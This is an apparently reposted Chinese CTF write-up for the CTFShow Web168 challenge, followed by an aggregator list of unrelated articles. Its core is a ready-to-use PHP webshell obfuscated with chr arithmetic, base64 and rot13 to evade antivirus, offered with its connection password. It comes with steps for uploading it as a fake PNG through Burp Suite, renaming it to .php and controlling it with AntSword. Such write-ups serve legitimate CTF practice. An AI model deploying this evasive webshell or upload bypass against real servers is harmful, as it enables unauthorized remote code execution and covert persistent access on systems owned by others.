CTFShow-Web168:免杀脚本

news/2025/2/23 16:23:41/文章来源:https://www.cnblogs.com/cookiescs/p/18715362

CTFShow-Web168:免杀脚本

eval,system还有$_POST$_GET进行过滤,$_REQUEST还可以用

🛠️ Web167 WriteUp

提供一个免杀脚本:

<?php $bFIY=create_function(chr(25380/705).chr(92115/801).base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ=='),chr(0x16964/0x394).chr(0x6f16/0xf1).base64_decode('YQ==').base64_decode('bA==').chr(060340/01154).chr(01041-0775).base64_decode('cw==').str_rot13('b').chr(01504-01327).base64_decode('ZQ==').chr(057176/01116).chr(0xe3b4/0x3dc));$bFIY(base64_decode('NjgxO'.'Tc7QG'.'V2QWw'.'oJF9Q'.''.str_rot13('G').str_rot13('1').str_rot13('A').base64_decode('VQ==').str_rot13('J').''.''.chr(0x304-0x2d3).base64_decode('Ug==').chr(13197/249).str_rot13('F').base64_decode('MQ==').''.'B1bnR'.'VXSk7'.'MjA0N'.'TkxOw'.'=='.''));?>

TyKPuntU是链接密码

  1. 使用Burp Suite上传内容为免杀脚本的图片a.png绕过前端验证,修改后缀为a.php

  2. 访问a.php,路径为/upload/a.php

    上传成功返回:**Deprecated**: Function create_function() is deprecated in **/var/www/html/upload/a.php** on line **1**

  3. 使用蚁剑连接

    image-20250214143807729

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/883716.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

搭建gitlab runner

搭建gitlab runner

1、搭建runner 镜像:gitlab/gitlab-runner:latest 2、注册runner,输入gitlab-runner register命令 root@runner-6f49c57c49-5889v:/# gitlab-runner register Runtime platform arch=amd64 os=linux pid=1054 revision=81ab07f6 version=1…
阅读更多...
前端开发过程小知识点记录(开发过程实时更新)

前端开发过程小知识点记录(开发过程实时更新)

1.#main div 距离页面顶部和左边有间距,但是并没有人为设置 出现现象图: 原因:大多数浏览器会为 body 和 html 元素添加默认的外边距。可以通过重置这些样式来解决此问题。 解决办法:在css中清除浏览器的默认样式 html, body { margin: 0; /* 清除默认外边距 */ padding: 0…
阅读更多...
Idea自动生成注释

Idea自动生成注释

原文链接 使用IDEA配置自动生成注释。 1 创建类时自动加注释 点击左上角菜单栏的 file -> Setting -> Editor -> File and Code Templates -> Includes -> File Header输入如下内容: /***@Author: 代码的路*@Date: ${DATE} ${TIME}*@Param: *@Return: *@Descri…
阅读更多...
JavaIO流(三)

JavaIO流(三)

6.转换流 不同编码读取出现乱码的问题:如果代码编码和被读取的文本文件编码是一致的,使用字符流读取文本时不会出现乱码 如果代码编码和被读取的文本文件编码是不一致的,使用字符流读取文本时就会出现乱码InputStreamReader(字符输入转换流) 是Reader抽象类下的实现类解决…
阅读更多...
pycharm上传github问题:rejected

pycharm上传github问题:rejected

我从pycharm上传项目时,遇到的问题:以下是一些解决思路: 这个错误提示表明,你在尝试将本地代码推送到远程仓库时,远程仓库中已经包含了你本地尚未获取的更改。换句话说,远程仓库的代码比你的本地代码更新。Git 为了防止冲突,拒绝了你的推送操作。 错误原因 这种情况通常…
阅读更多...
EDR简介

EDR简介

一、什么是edr 终端检测与响应(EDR)是一种安全解决方案,可检测并响应勒索软件和恶意软件等威胁。它通过持续监控端点可疑活动来工作,方法是收集有关事件的数据,如系统日志、网络流量、进程间通信 (IPC)、RPC 调用、身份验证尝试和用户活动。 安装在端点上的 EDR 将收集数据…
阅读更多...
KUKA库卡KR210机器人维修解决方案概览

KUKA库卡KR210机器人维修解决方案概览

库卡KR210机器人,作为一款集高性能与广泛适用性于一体的工业机器人,在众多生产线上发挥着举足轻重的作用。在其高效运转的过程中,难免会遇到一些故障,及时的维修与保养就显得尤为重要。以下,将详细阐述一些常见的维修方法及其注意事项,以期为使用者提供更为全面的指导。常…
阅读更多...
NetScaler Console 13.1 Build 57.26 发布,新增功能概览 (集中管理 NetScaler)

NetScaler Console 13.1 Build 57.26 发布,新增功能概览 (集中管理 NetScaler)

NetScaler Console 13.1 Build 57.26 发布,新增功能概览 (集中管理 NetScaler)NetScaler Console Release 13.1 Build 57.26 (ESXi, Hyper-V, KVM, Xen) Formerly known as Citrix ADM - 集中管理 NetScaler 请访问原文链接:https://sysin.org/blog/netscaler-console-13/ 查…
阅读更多...
NetScaler 13.1 Build 57.26 发布,新增功能概览 (混合多云应用交付控制器)

NetScaler 13.1 Build 57.26 发布,新增功能概览 (混合多云应用交付控制器)

NetScaler 13.1 Build 57.26 发布,新增功能概览 (混合多云应用交付控制器)NetScaler Release 13.1 Build 57.26 (nCore, VPX, SDX, CPX, BLX) Formerly known as Citrix ADC - 混合多云应用交付控制器 请访问原文链接:https://sysin.org/blog/netscaler-13/ 查看最新版。原创…
阅读更多...
keycloak~认证与校验使用说明

keycloak~认证与校验使用说明

主要内容密码认证 授权码认证 哪个client申请的code,使用哪个client获取token 客户端认证 在kc开通了服务端帐号之后,可通过client_id和client_secret来获取token,与用户无关,无刷新token机制 自动触发社区认证 当用户在社区网站上登录后,访问这个地址可自动登录法宝 验证…
阅读更多...
Dify报错model schema not found

Dify报错model schema not found

工作室操作 Agent 选择模型时对话报错: "Model schema not found" error only in agents是因为没打开模型的函数调用功能:当然,也不是所有模型都支持该功能。 本文已收录在Github,关注我,紧跟本系列专栏文章,咱们下篇再续!🚀 魔都架构师 | 全网30W+技术追随…
阅读更多...
论文阅读 | 离线强化学习研究综述25年1月

论文阅读 | 离线强化学习研究综述25年1月

文章来源 计算机学报2025年1月 比较新的一篇中文综述,值得一读 O IntroductionDRL应用如AlphaGo需要与环境在线交互,并且进行大量数据采样,现实世界代价昂贵且试错风险极高 2020年Levine提出离线强化学习概念(Offline Reinforcement Learning, Offline RL) 挑战:还是函数…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023